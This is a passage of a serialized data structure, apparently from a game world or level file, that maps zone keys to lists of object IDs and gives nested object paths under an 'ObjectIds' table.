'1237582592.0akelts0', '1236212352.0akelts3', '1235611117.31akelts'], []),'1_1235611119.33akelts': ([], ['1237584512.0akelts', '1235611120.45akelts', '1237588864.0akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237574300.08akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611035.98akelts', '1237590784.0akelts', '1235611119.02akelts', '1235611519.63akelts', '1235611530.08akelts', '1237591040.0akelts', '1237590912.0akelts'], []),'1_1235611119.91akelts': ([], ['1237588864.0akelts', '1235611120.45akelts', '1237588864.0akelts0', '1237584512.0akelts', '1235611119.91akelts', '1237591040.0akelts', '1235611119.33akelts', '1237590912.0akelts', '1235611519.63akelts', '1235611530.08akelts', '1235611061.09akelts', '1235611035.98akelts', '1235611121.0akelts'], []),'1_1235611120.45akelts': ([], ['1235611120.45akelts', '1237588864.0akelts', '1235611119.91akelts', '1235611519.63akelts', '1237590912.0akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237584512.0akelts', '1235611530.08akelts', '1237591040.0akelts', '1235611035.98akelts', '1235611361.5akelts', '1237827147.39akelts', '1237827026.68akelts', '1237827221.59akelts', '1237827053.79akelts', '1237827104.49akelts', '1235611534.09akelts', '1235611352.94akelts', '1237827576.62akelts', '1237827472.21akelts'], []),'1_1235611121.0akelts': ([], ['1235611121.0akelts', '1235611061.09akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611119.33akelts', '1235611792.13akelts', '1235611119.91akelts', '1235611035.98akelts', '1235611115.91akelts', '1235611117.31akelts', '1237574022.48akelts', '1237574300.08akelts', '1237594368.0akelts', '1237588608.0akelts', '1237584512.0akelts', '1235611120.45akelts', '1237588864.0akelts'], []),'1_1235611344.81akelts': ([], ['1235611344.81akelts', '1235611353.63akelts', '1237827511.65akelts', '1237827546.46akelts', '1237827026.68akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827053.79akelts', '1235611534.09akelts'], []),'1_1235611347.08akelts': ([], ['1235611347.08akelts', '1237827026.68akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827221.59akelts', '1235611348.83akelts'], []),'1_1235611348.2akelts': ([], ['1235611348.2akelts', '1235611347.08akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827026.68akelts', '1235611348.83akelts'], []),'1_1235611352.94akelts': ([], ['1237827026.68akelts', '1237827104.49akelts', '1235611534.09akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827472.21akelts', '1235611120.45akelts', '1237827147.39akelts', '1237827576.62akelts', '1235611361.5akelts', '1235611347.08akelts', '1235611528.14akelts', '1235611344.81akelts', '1235611353.63akelts', '1237827511.65akelts'], []),'1_1235611353.63akelts': ([], ['1235611352.23akelts', '1237827511.65akelts', '1235611353.63akelts', '1235611344.81akelts', '1237827472.21akelts', '1235611352.94akelts'], []),'1_1235611361.5akelts': ([], ['1235611361.5akelts', '1235611120.45akelts', '1235611352.94akelts', '1237827147.39akelts', '1237827026.68akelts', '1237827053.79akelts', '1237827221.59akelts', '1235611534.09akelts', '1237827104.49akelts', '1235611528.14akelts', '1237827472.21akelts', '1237827576.62akelts', '1235611347.08akelts'], []),'1_1235611519.63akelts': ([], ['1235611530.08akelts', '1237591040.0akelts', '1235611519.63akelts', '1235611119.33akelts', '1237590912.0akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611120.45akelts', '1237588864.0akelts', '1237584512.0akelts', '1235611530.73akelts'], []),'1_1235611528.14akelts': ([], ['1235611528.14akelts', '1237827104.49akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827026.68akelts', '1235611534.09akelts', '1237827221.59akelts', '1235611528.78akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611529.42akelts', '1237595008.0akelts'], []),'1_1235611528.78akelts': ([], ['1237595008.0akelts', '1237584384.0akelts', '1235611746.08akelts', '1235611529.42akelts', '1235611528.78akelts', '1237584384.0akelts0', '1237595136.0akelts', '1235611528.14akelts'], []),'1_1235611529.42akelts': ([], ['1237584384.0akelts', '1235611529.42akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237584384.0akelts0', '1237595136.0akelts', '1235611746.08akelts', '1235611533.41akelts', '1235611532.73akelts', '1235611532.06akelts', '1237828412.73akelts'], []),'1_1235611530.08akelts': ([], ['1237591040.0akelts', '1235611530.08akelts', '1237584256.0akelts0', '1235611530.73akelts', '1237587968.0akelts', '1237584256.0akelts', '1237584256.0akelts1', '1235611519.63akelts', '1235611119.33akelts', '1235611119.91akelts', '1237590912.0akelts', '1237584512.0akelts', '1237588864.0akelts0', '1237588864.0akelts', '1235611120.45akelts'], []),'1_1235611530.73akelts': ([], ['1235611530.73akelts', '1235611531.39akelts', '1235611519.63akelts', '1235611530.08akelts', '1237584256.0akelts', '1237584256.0akelts0', '1235611532.06akelts', '1237828366.56akelts', '1237828348.45akelts', '1237584256.0akelts1', '1237587968.0akelts'], []),'1_1235611531.39akelts': ([], ['1235611531.39akelts', '1237584256.0akelts1', '1235611530.73akelts', '1237584256.0akelts', '1235611532.73akelts', '1235611532.06akelts', '1235611533.41akelts', '1235611530.08akelts', '1237584256.0akelts0', '1237828366.56akelts', '1237828348.45akelts'], []),'1_1235611532.06akelts': ([], ['1235611532.06akelts', '1237584256.0akelts1', '1235611531.39akelts', '1235611530.73akelts', '1235611746.08akelts', '1235611533.41akelts', '1237828412.73akelts', '1237828348.45akelts', '1237828366.56akelts', '1235611529.42akelts'], []),'1_1235611533.41akelts': ([], ['1235611532.73akelts', '1235611532.06akelts', '1235611533.41akelts', '1235611531.39akelts', '1235611746.08akelts', '1237828412.73akelts', '1235611529.42akelts', '1237584384.0akelts', '1237828348.45akelts', '1237828366.56akelts'], []),'1_1235611534.09akelts': ([], ['1235611528.14akelts', '1237827104.49akelts', '1235611534.09akelts', '1237827053.79akelts', '1237827026.68akelts', '1235611352.94akelts', '1237827221.59akelts', '1235611120.45akelts', '1237827147.39akelts', '1237827576.62akelts', '1235611361.5akelts', '1237827472.21akelts'], []),'1_1235611746.08akelts': ([], ['1235611533.41akelts', '1235611532.06akelts', '1235611532.73akelts', '1235611746.08akelts', '1237584384.0akelts', '1235611529.42akelts', '1235611528.78akelts', '1237828412.73akelts', '1237828366.56akelts'], []),'1_1235611775.94akelts': ([], ['1235611787.47akelts', '1237593984.0akelts0', '1235611775.94akelts', '1237594112.0akelts0', '1237594240.0akelts0', '1237584000.0akelts0', '1237582208.0akelts', '1235611795.97akelts', '1237594240.0akelts1', '1237594240.0akelts2', '1235611119.02akelts', '1235611791.19akelts', '1236212352.0akelts2', '1237582592.0akelts0', '1236212352.0akelts3', '1235611792.13akelts', '1237593984.0akelts1', '1235611782.08akelts', '1237593984.0akelts'], []),'1_1235611777.48akelts': ([], ['1235611777.48akelts', '1235611787.47akelts', '1237593984.0akelts1', '1237593984.0akelts0', '1237593984.0akelts', '1235611784.77akelts', '1237594112.0akelts', '1235611795.0akelts'], []),'1_1235611782.08akelts': ([], ['1235611782.08akelts', '1235611783.0akelts', '1237593984.0akelts', '1235611775.94akelts', '1235611787.47akelts', '1237593984.0akelts0', '1235611783.89akelts', '1237593728.0akelts', '1237583872.0akelts', '1237584000.0akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611786.56akelts', '1235611789.31akelts', '1237593856.0akelts0'], []),'1_1235611783.0akelts': ([], ['1235611786.56akelts', '1237593600.0akelts', '1235611789.31akelts', '1237584000.0akelts', '1237593728.0akelts', '1235611788.39akelts', '1235611783.0akelts', '1237583872.0akelts', '1235611782.08akelts', '1235611785.67akelts', '1235611783.89akelts', '1235611793.08akelts'], []),'1_1235611783.89akelts': ([], ['1235611783.89akelts', '1237593728.0akelts', '1235611783.0akelts', '1237593856.0akelts0', '1237584000.0akelts', '1237583872.0akelts', '1235611782.08akelts', '1235611785.67akelts'], []),'1_1235611784.77akelts': ([], ['1235611795.0akelts', '1235611784.77akelts', '1235611777.48akelts', '1235611781.22akelts', '1237594112.0akelts', '1237593984.0akelts', '1235611787.47akelts', '1235611782.08akelts'], []),'1_1235611786.56akelts': ([], ['1235611789.31akelts', '1235611788.39akelts', '1237593600.0akelts', '1235611793.08akelts', '1235611786.56akelts', '1235611783.0akelts', '1237593728.0akelts', '1237584000.0akelts', '1237583872.0akelts', '1235611782.08akelts', '1235611783.89akelts', '1237593856.0akelts0'], []),'1_1235611787.47akelts': ([], ['1235611775.94akelts', '1237593984.0akelts1', '1235611777.48akelts', '1235611782.08akelts', '1237593984.0akelts', '1237593984.0akelts0', '1235611787.47akelts', '1237594112.0akelts', '1235611781.22akelts'], []),'1_1235611788.39akelts': ([], ['1235611788.39akelts', '1236212480.0akelts1', '1235611793.08akelts', '1235611786.56akelts', '1237593856.0akelts0', '1237583872.0akelts', '1237584000.0akelts', '1237593728.0akelts', '1235611782.08akelts', '1235611783.0akelts', '1237593600.0akelts', '1235611789.31akelts'], []),'1_1235611789.31akelts': ([], ['1235611789.31akelts', '1235611790.25akelts', '1235611786.56akelts', '1237584000.0akelts', '1235611782.08akelts', '1237593728.0akelts', '1237593856.0akelts0', '1235611783.0akelts', '1237593600.0akelts', '1235611793.08akelts', '1235611791.19akelts', '1235611794.03akelts', '1236212480.0akelts1', '1235611788.39akelts', '1236212352.0akelts4', '1237583616.0akelts'], []),'1_1235611790.25akelts': ([], ['1235611789.31akelts', '1235611788.39akelts', '1237593600.0akelts', '1235611790.25akelts', '1235611791.19akelts', '1236212352.0akelts4', '1237583616.0akelts', '1237583616.0akelts0'], []),'1_1235611791.19akelts': ([], ['1236212352.0akelts4', '1237582592.0akelts', '1236212352.0akelts3', '1237582592.0akelts0', '1236212352.0akelts2', '1235611792.13akelts', '1237583616.0akelts', '1235611791.19akelts', '1237583616.0akelts0', '1235611790.25akelts', '1235611789.31akelts', '1237582208.0akelts'], []),'1_1235611792.13akelts': ([], ['1236212352.0akelts2', '1235611795.97akelts', '1237594240.0akelts2', '1237582208.0akelts', '1237584000.0akelts0', '1237594240.0akelts0', '1235611119.02akelts', '1237582592.0akelts0', '1236212352.0akelts3', '1235611792.13akelts', '1237583616.0akelts', '1235611791.19akelts', '1236212352.0akelts4', '1237582592.0akelts', '1237574022.48akelts', '1237590784.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1237594240.0akelts1', '1235611775.94akelts', '1237594112.0akelts0'], []),'1_1235611793.08akelts': ([], ['1237583744.0akelts', '1235611794.03akelts', '1235611793.08akelts', '1235611788.39akelts', '1236212480.0akelts1', '1235611786.56akelts', '1237593600.0akelts'], []),'1_1235611795.97akelts': ([], ['1235611775.94akelts', '1237594112.0akelts0', '1235611795.97akelts', '1236212352.0akelts2', '1237582208.0akelts', '1235611792.13akelts', '1237582592.0akelts0', '1236212352.0akelts3', '1235611791.19akelts', '1235611119.02akelts', '1237594240.0akelts0', '1235611035.98akelts', '1237584000.0akelts0', '1235611117.05akelts', '1237594240.0akelts1'], []),'1_1236293632.0akelts': ([], ['1236293632.0akelts', '1235611117.69akelts', '1237573940.19akelts'], []),'2_1235611035.98akelts': ([], ['1235611119.02akelts', '1235611035.98akelts', '1235611795.97akelts', '1235611117.05akelts', '1235611117.31akelts', '1235611519.63akelts', '1235611119.33akelts', '1235611061.09akelts', '1237584000.0akelts0', '1237594240.0akelts0', '1237594240.0akelts1', '1237574022.48akelts', '1237574300.08akelts', '1237590912.0akelts', '1237594368.0akelts', '1237582208.0akelts', '1235611792.13akelts', '1237594240.0akelts2', '1236212352.0akelts2', '1236212352.0akelts3'], []),'2_1235611115.91akelts': ([], ['1235611121.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1235611115.91akelts', '1235611116.59akelts', '1237588608.0akelts', '1237574022.48akelts'], []),'2_1235611117.69akelts': ([], ['1235611117.31akelts', '1235611117.69akelts', '1237594368.0akelts', '1236293632.0akelts', '1235611035.98akelts', '1235611117.05akelts', '1237574022.48akelts', '1237574300.08akelts'], []),'2_1235611119.02akelts': ([], ['1235611119.02akelts', '1235611035.98akelts', '1237574300.08akelts', '1235611119.33akelts', '1237590912.0akelts', '1237574022.48akelts', '1237590784.0akelts', '1235611795.97akelts', '1237594240.0akelts1', '1237584000.0akelts0', '1235611775.94akelts', '1237594112.0akelts0', '1237594240.0akelts0', '1237594240.0akelts2', '1235611792.13akelts', '1236212352.0akelts2', '1236212352.0akelts3', '1235611117.05akelts', '1235611061.09akelts'], []),'2_1235611119.33akelts': ([], ['1237590912.0akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1235611119.33akelts', '1235611119.91akelts', '1237588864.0akelts', '1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611035.98akelts', '1235611119.02akelts', '1237574022.48akelts', '1237590784.0akelts', '1237582208.0akelts', '1235611792.13akelts', '1237574300.08akelts', '1235611061.09akelts'], []),'2_1235611120.45akelts': ([], ['1235611120.45akelts', '1235611519.63akelts', '1237584512.0akelts', '1237588864.0akelts', '1235611119.91akelts', '1237591040.0akelts', '1237590912.0akelts', '1237588864.0akelts0', '1235611530.08akelts', '1235611119.33akelts', '1235611035.98akelts', '1235611061.09akelts', '1235611121.0akelts', '1235611361.5akelts', '1237827147.39akelts'], []),'2_1235611344.81akelts': ([], ['1235611344.81akelts', '1237827511.65akelts', '1235611353.63akelts', '1237827053.79akelts', '1235611534.09akelts', '1237827026.68akelts', '1237827472.21akelts'], []),'2_1235611348.2akelts': ([], ['1235611348.83akelts', '1235611348.2akelts', '1235611361.5akelts', '1235611347.08akelts', '1237827576.62akelts', '1237827026.68akelts'], []),'2_1235611352.94akelts': ([], ['1235611352.94akelts', '1235611344.81akelts', '1237827511.65akelts', '1235611353.63akelts', '1237827053.79akelts', '1235611534.09akelts', '1237827104.49akelts', '1235611528.14akelts', '1237827472.21akelts', '1235611361.5akelts', '1235611347.08akelts', '1237827576.62akelts', '1235611120.45akelts', '1237827147.39akelts', '1237827221.59akelts', '1237827026.68akelts'], []),'2_1235611353.63akelts': ([], ['1235611352.23akelts', '1235611353.63akelts', '1237827511.65akelts', '1235611344.81akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827546.46akelts'], []),'2_1235611361.5akelts': ([], ['1235611348.2akelts', '1235611347.08akelts', '1235611361.5akelts', '1235611120.45akelts', '1237827147.39akelts', '1237827053.79akelts', '1237827026.68akelts', '1235611534.09akelts', '1237827221.59akelts', '1235611352.94akelts', '1237827104.49akelts', '1237827576.62akelts', '1237827472.21akelts'], []),'2_1235611528.14akelts': ([], ['1235611528.14akelts', '1235611534.09akelts', '1237827053.79akelts', '1237827104.49akelts', '1235611352.94akelts', '1237827221.59akelts', '1237827026.68akelts'], []),'2_1235611529.42akelts': ([], ['1235611746.08akelts', '1235611533.41akelts', '1235611532.06akelts', '1235611529.42akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237584384.0akelts0', '1237595136.0akelts', '1237828412.73akelts'], []),'2_1235611530.08akelts': ([], ['1235611530.08akelts', '1235611530.73akelts', '1235611519.63akelts', '1237591040.0akelts', '1237584256.0akelts0', '1235611119.33akelts', '1237590912.0akelts', '1235611119.91akelts', '1237588864.0akelts', '1237584512.0akelts', '1235611120.45akelts', '1237588864.0akelts0'], []),'2_1235611530.73akelts': ([], ['1237584256.0akelts', '1235611531.39akelts', '1235611532.06akelts', '1235611530.08akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'2_1235611532.06akelts': ([], ['1235611532.73akelts', '1235611532.06akelts', '1235611533.41akelts', '1235611746.08akelts', '1235611531.39akelts', '1235611530.73akelts', '1237584256.0akelts', '1237584256.0akelts1', '1237828412.73akelts', '1235611529.42akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'2_1235611775.94akelts': ([], ['1235611775.94akelts', '1235611795.97akelts', '1237582208.0akelts', '1236212352.0akelts3', '1237594240.0akelts1', '1237584000.0akelts0', '1237582592.0akelts0', '1235611119.02akelts', '1237594240.0akelts0', '1235611792.13akelts', '1236212352.0akelts2', '1235611791.19akelts', '1237594240.0akelts2', '1235611787.47akelts', '1237593984.0akelts0'], []),'2_1235611777.48akelts': ([], ['1235611781.22akelts', '1235611777.48akelts', '1235611795.0akelts', '1235611784.77akelts', '1237593984.0akelts1', '1235611787.47akelts', '1237593984.0akelts0', '1237593984.0akelts', '1235611782.08akelts'], []),'2_1235611782.08akelts': ([], ['1235611782.08akelts', '1237593984.0akelts', '1235611787.47akelts', '1237593984.0akelts1', '1235611775.94akelts', '1237593984.0akelts0'], []),'2_1235611783.0akelts': ([], ['1235611786.56akelts', '1235611788.39akelts', '1235611789.31akelts', '1237593600.0akelts', '1237593728.0akelts', '1237584000.0akelts', '1237593856.0akelts0', '1235611783.0akelts', '1235611783.89akelts', '1237583872.0akelts0', '1235611782.08akelts', '1235611793.08akelts', '1235611785.67akelts'], []),'2_1235611783.89akelts': ([], ['1237583872.0akelts0', '1235611783.89akelts', '1235611785.67akelts', '1235611783.0akelts', '1235611782.08akelts', '1237583872.0akelts', '1237593856.0akelts0', '1237593728.0akelts', '1237584000.0akelts'], []),'2_1235611784.77akelts': ([], ['1235611795.0akelts', '1235611784.77akelts', '1235611777.48akelts', '1237594112.0akelts', '1235611781.22akelts', '1237593984.0akelts', '1235611782.08akelts', '1235611787.47akelts', '1237593984.0akelts1'], []),'2_1235611787.47akelts': ([], ['1237593984.0akelts1', '1235611775.94akelts', '1237594112.0akelts', '1235611781.22akelts', '1235611777.48akelts', '1237593984.0akelts', '1235611782.08akelts', '1235611787.47akelts', '1237593984.0akelts0', '1235611784.77akelts', '1235611795.0akelts'], []),'2_1235611788.39akelts': ([], ['1236212480.0akelts1', '1235611788.39akelts', '1235611786.56akelts', '1237593728.0akelts', '1235611782.08akelts', '1237593856.0akelts0', '1237584000.0akelts', '1235611783.0akelts', '1237583872.0akelts', '1237593600.0akelts', '1235611789.31akelts', '1235611794.03akelts', '1235611793.08akelts', '1237583744.0akelts'], []),'2_1235611789.31akelts': ([], ['1235611790.25akelts', '1235611793.08akelts', '1235611788.39akelts', '1236212480.0akelts1', '1235611794.03akelts', '1235611786.56akelts', '1237584000.0akelts', '1235611782.08akelts', '1237593728.0akelts', '1237593856.0akelts0', '1235611783.0akelts', '1237593600.0akelts'], []),'2_1235611791.19akelts': ([], ['1235611792.13akelts', '1236212352.0akelts2', '1237582208.0akelts', '1236212352.0akelts3', '1237582592.0akelts0', '1237582592.0akelts', '1235611795.97akelts', '1235611791.19akelts', '1236212352.0akelts4', '1237583616.0akelts0', '1237583616.0akelts', '1235611790.25akelts', '1235611789.31akelts', '1235611119.02akelts'], []),'2_1235611793.08akelts': ([], ['1235611793.08akelts', '1237583744.0akelts', '1235611788.39akelts', '1236212480.0akelts1'], []),'3_1235611035.98akelts': ([], ['1235611117.05akelts', '1235611117.31akelts', '1235611035.98akelts', '1235611119.02akelts', '1235611795.97akelts', '1235611061.09akelts', '1235611121.0akelts', '1235611119.33akelts', '1235611519.63akelts', '1237574300.08akelts', '1237590784.0akelts', '1237588608.0akelts', '1237574022.48akelts', '1237594240.0akelts0', '1237584000.0akelts0', '1237594240.0akelts1', '1237582208.0akelts', '1237594368.0akelts', '1235611117.69akelts', '1237590912.0akelts'], []),'3_1235611119.02akelts': ([], ['1236212352.0akelts2', '1236212352.0akelts3', '1235611792.13akelts', '1237582592.0akelts0', '1235611119.02akelts', '1235611061.09akelts', '1235611035.98akelts', '1235611119.33akelts', '1237574022.48akelts', '1237590912.0akelts', '1237574300.08akelts', '1237590784.0akelts', '1237582208.0akelts', '1235611795.97akelts', '1237594240.0akelts1', '1237594240.0akelts0', '1237594240.0akelts2', '1237584000.0akelts0', '1237594112.0akelts0', '1235611775.94akelts', '1235611791.19akelts'], []),'3_1235611119.33akelts': ([], ['1235611119.33akelts', '1235611119.91akelts', '1237574300.08akelts', '1235611035.98akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1237574022.48akelts', '1237588864.0akelts0', '1237588864.0akelts', '1237584512.0akelts', '1235611120.45akelts', '1237590784.0akelts', '1235611119.02akelts', '1237582208.0akelts', '1235611792.13akelts'], []),'3_1235611352.94akelts': ([], ['1237827053.79akelts', '1237827104.49akelts', '1235611534.09akelts', '1235611528.14akelts', '1235611352.94akelts', '1235611344.81akelts', '1237827472.21akelts', '1237827147.39akelts', '1237827026.68akelts', '1235611120.45akelts', '1235611361.5akelts', '1237827221.59akelts', '1237827576.62akelts'], []),'3_1235611361.5akelts': ([], ['1237827053.79akelts', '1235611534.09akelts', '1235611352.94akelts', '1237827026.68akelts', '1237827104.49akelts', '1237827472.21akelts', '1235611120.45akelts', '1237827147.39akelts', '1235611361.5akelts', '1237827576.62akelts', '1235611347.08akelts', '1235611348.2akelts', '1235611528.14akelts'], []),'3_1235611532.06akelts': ([], ['1235611532.06akelts', '1235611532.73akelts', '1235611531.39akelts', '1237584256.0akelts', '1235611530.73akelts', '1235611533.41akelts', '1235611746.08akelts', '1237584256.0akelts1', '1237828412.73akelts', '1235611529.42akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'3_1235611777.48akelts': ([], ['1237593984.0akelts', '1235611787.47akelts', '1235611782.08akelts', '1237593984.0akelts1', '1235611777.48akelts', '1235611781.22akelts', '1237594112.0akelts', '1235611795.0akelts', '1235611784.77akelts', '1237593984.0akelts0'], []),'3_1235611783.0akelts': ([], ['1235611783.0akelts', '1237584000.0akelts', '1237593856.0akelts0', '1235611789.31akelts', '1235611788.39akelts', '1237593728.0akelts', '1235611786.56akelts', '1237583872.0akelts', '1235611783.89akelts', '1237583872.0akelts0', '1235611782.08akelts', '1237593600.0akelts'], []),'3_1235611787.47akelts': ([], ['1235611782.08akelts', '1237593984.0akelts', '1237593984.0akelts0', '1235611787.47akelts', '1235611775.94akelts', '1237593984.0akelts1', '1235611795.0akelts', '1235611784.77akelts', '1235611777.48akelts'], []),'3_1235611788.39akelts': ([], ['1235611789.31akelts', '1235611788.39akelts', '1237593728.0akelts', '1237593856.0akelts0', '1235611786.56akelts', '1235611783.0akelts', '1237584000.0akelts', '1235611782.08akelts', '1236212480.0akelts1', '1235611793.08akelts', '1235611794.03akelts', '1237583744.0akelts', '1237583872.0akelts', '1235611790.25akelts'], []),'4_1235611035.98akelts': ([], ['1235611119.33akelts', '1235611119.91akelts', '1235611117.05akelts', '1235611117.31akelts', '1235611792.13akelts', '1235611061.09akelts', '1235611121.0akelts', '1235611519.63akelts', '1235611795.97akelts', '1235611117.69akelts', '1237588608.0akelts', '1237574022.48akelts', '1237574300.08akelts', '1237590912.0akelts', '1237594368.0akelts', '1237588864.0akelts', '1237582208.0akelts', '1237590784.0akelts', '1237584000.0akelts0', '1237594240.0akelts0', '1235611119.02akelts', '1235611035.98akelts', '1237594240.0akelts1'], [])},'Layers': {},'ObjectIds': {'1235605888.0akelts': '["Objects"]["1235605888.0akelts"]','1235611035.98akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]','1235611036.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1235611036.02akelts"]','1235611036.03akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1235611036.03akelts"]','1235611036.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1235611036.05akelts"]','1235611036.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1235611036.0akelts"]','1235611061.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611061.09akelts"]','1235611061.11akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611061.09akelts"]["Objects"]["1235611061.11akelts"]','1235611061.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611061.09akelts"]["Objects"]["1235611061.13akelts"]','1235611115.91akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611115.91akelts"]','1235611115.92akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611115.91akelts"]["Objects"]["1235611115.92akelts"]','1235611116.59akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]','1235611116.61akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]["Objects"]["1235611116.61akelts"]','1235611117.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.05akelts"]','1235611117.06akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.05akelts"]["Objects"]["1235611117.06akelts"]','1235611117.31akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.31akelts"]','1235611117.33akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.31akelts"]["Objects"]["1235611117.33akelts"]','1235611117.69akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.69akelts"]','1235611117.7akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.69akelts"]["Objects"]["1235611117.7akelts"]','1235611119.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]','1235611119.03akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]["Objects"]["1235611119.03akelts"]','1235611119.33akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]','1235611119.34akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1235611119.34akelts"]','1235611119.91akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]','1235611119.92akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1235611119.92akelts"]','1235611120.45akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]','1235611120.47akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1235611120.47akelts"]','1235611121.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611121.0akelts"]["Objects"]["1235611121.02akelts"]','1235611121.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611121.0akelts"]','1235611141.33akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611121.0akelts"]["Objects"]["1235611141.33akelts"]','1235611147.86akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611115.91akelts"]["Objects"]["1235611147.86akelts"]','1235611170.42akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.05akelts"]["Objects"]["1235611170.42akelts"]','1235611198.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.31akelts"]["Objects"]["1235611198.48akelts"]','1235611209.75akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.69akelts"]["Objects"]["1235611209.75akelts"]','1235611298.88akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]["Objects"]["1235611298.88akelts"]','1235611298.89akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]["Objects"]["1235611298.89akelts"]','1235611307.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1235611307.05akelts"]','1235611307.06akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1235611307.06akelts"]','1235611316.72akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1235611316.72akelts"]','1235611328.42akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1235611328.42akelts"]','1235611344.81akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611344.81akelts"]','1235611344.83akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611344.81akelts"]["Objects"]["1235611344.83akelts"]','1235611344.89akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611344.81akelts"]["Objects"]["1235611344.89akelts"]','1235611347.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611347.08akelts"]','1235611347.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611347.08akelts"]["Objects"]["1235611347.09akelts"]','1235611347.16akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611347.08akelts"]["Objects"]["1235611347.16akelts"]','1235611348.22akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611348.2akelts"]["Objects"]["1235611348.22akelts"]','1235611348.28akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611348.2akelts"]["Objects"]["1235611348.28akelts"]','1235611348.2akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611348.2akelts"]','1235611348.83akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611348.83akelts"]','1235611348.84akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611348.83akelts"]["Objects"]["1235611348.84akelts"]','1235611352.23akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.23akelts"]','1235611352.3akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.23akelts"]["Objects"]["1235611352.3akelts"]','1235611352.94akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]','1235611352.95akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1235611352.95akelts"]','1235611352.97akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1235611352.97akelts"]','1235611353.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1235611353.02akelts"]','1235611353.63akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]','1235611353.64akelts': 